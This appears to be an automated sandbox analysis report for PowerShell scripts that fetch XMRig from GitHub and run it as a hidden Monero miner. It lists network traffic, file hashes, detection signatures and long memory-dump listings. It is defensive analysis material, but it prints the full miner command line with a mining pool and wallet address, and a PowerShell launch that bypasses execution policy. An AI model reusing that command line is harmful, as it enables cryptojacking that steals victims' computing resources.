Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

memory/2736-2-0x00007FFF18473000-0x00007FFF18474000-memory.dmp

memory/2736-5-0x0000027DB6F80000-0x0000027DB6FA2000-memory.dmp

memory/2736-8-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-9-0x0000027DB7240000-0x0000027DB72B6000-memory.dmp

memory/2736-10-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zzgurow4.ba2.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2736-25-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-48-0x0000027DB7220000-0x0000027DB7232000-memory.dmp

memory/2736-61-0x0000027DB7210000-0x0000027DB721A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2348-90-0x000001E0AB180000-0x000001E0AB1A0000-memory.dmp

memory/2348-91-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2736-93-0x00007FFF18473000-0x00007FFF18474000-memory.dmp

memory/2348-92-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2736-94-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2736-95-0x00007FFF18470000-0x00007FFF18E5C000-memory.dmp

memory/2348-96-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-97-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-98-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-99-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-100-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-101-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-102-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-103-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-104-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-105-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-106-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-107-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-108-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-109-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-110-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-111-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-112-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-113-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-114-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-115-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-116-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-117-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-118-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-119-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-120-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-121-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-122-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-123-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-124-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-125-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-126-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-127-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-128-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-129-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-130-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-131-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-132-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-133-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-134-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-135-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-136-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-137-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-138-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-139-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-140-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-141-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-142-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-143-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-144-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-145-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-146-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-147-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-148-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-149-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-150-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-151-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-152-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-153-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-154-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-155-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

memory/2348-156-0x00007FF6665D0000-0x00007FF667203000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:38

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 106.246.116.51.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4740-3-0x00007FFAB0573000-0x00007FFAB0574000-memory.dmp

memory/4740-5-0x000001A6F2B90000-0x000001A6F2BB2000-memory.dmp

memory/4740-6-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-10-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-9-0x000001A6F2C40000-0x000001A6F2CB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gjmailoj.qmq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4740-25-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-48-0x000001A6F2DE0000-0x000001A6F2DF2000-memory.dmp

memory/4740-61-0x000001A6F2B80000-0x000001A6F2B8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1996-90-0x000001C05C600000-0x000001C05C620000-memory.dmp

memory/1996-91-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-92-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/4740-93-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/4740-94-0x00007FFAB0573000-0x00007FFAB0574000-memory.dmp

memory/4740-95-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp

memory/1996-96-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-97-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-98-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-99-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-100-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-101-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-102-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-103-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-104-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-105-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-106-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-107-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-108-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-109-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-110-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-111-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-112-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-113-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-114-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-115-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-116-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-117-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-118-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-119-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-120-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-121-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-122-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-123-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-124-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-125-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-126-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-127-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-128-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-129-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-130-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-131-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-132-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-133-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-134-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-135-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-136-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-137-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-138-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-139-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-140-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-141-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-142-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-143-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-144-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-145-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-146-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-147-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-148-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-149-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-150-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-151-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-152-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-153-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-154-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-155-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

memory/1996-156-0x00007FF7CD9B0000-0x00007FF7CE5E3000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:40

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2492-0-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jvguqk30.key.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2492-9-0x0000022DE8D30000-0x0000022DE8D52000-memory.dmp

memory/2492-10-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-11-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-12-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-14-0x0000022DE8F10000-0x0000022DE8F22000-memory.dmp

memory/2492-15-0x0000022DE8EF0000-0x0000022DE8EFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/964-46-0x000002A3EF220000-0x000002A3EF240000-memory.dmp

memory/964-47-0x000002A3EF260000-0x000002A3EF280000-memory.dmp

memory/964-48-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-49-0x000002A3EF280000-0x000002A3EF2A0000-memory.dmp

memory/964-50-0x000002A3EF2A0000-0x000002A3EF2C0000-memory.dmp

memory/2492-52-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp

memory/2492-53-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/964-51-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/2492-54-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/964-55-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-56-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-57-0x000002A3EF280000-0x000002A3EF2A0000-memory.dmp

memory/964-58-0x000002A3EF2A0000-0x000002A3EF2C0000-memory.dmp

memory/964-59-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-60-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-61-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-62-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-63-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-64-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-65-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-66-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-67-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-68-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-69-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-70-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-71-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-72-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-73-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-74-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-75-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-76-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-77-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-78-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-79-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-80-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-81-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-82-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-83-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-84-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-85-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-86-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-87-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-88-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-89-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-90-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-91-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-92-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-93-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-94-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-95-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-96-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-97-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-98-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-99-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-100-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-101-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-102-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-103-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-104-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-105-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-106-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

memory/964-107-0x00007FF7B3F80000-0x00007FF7B4BB3000-memory.dmp

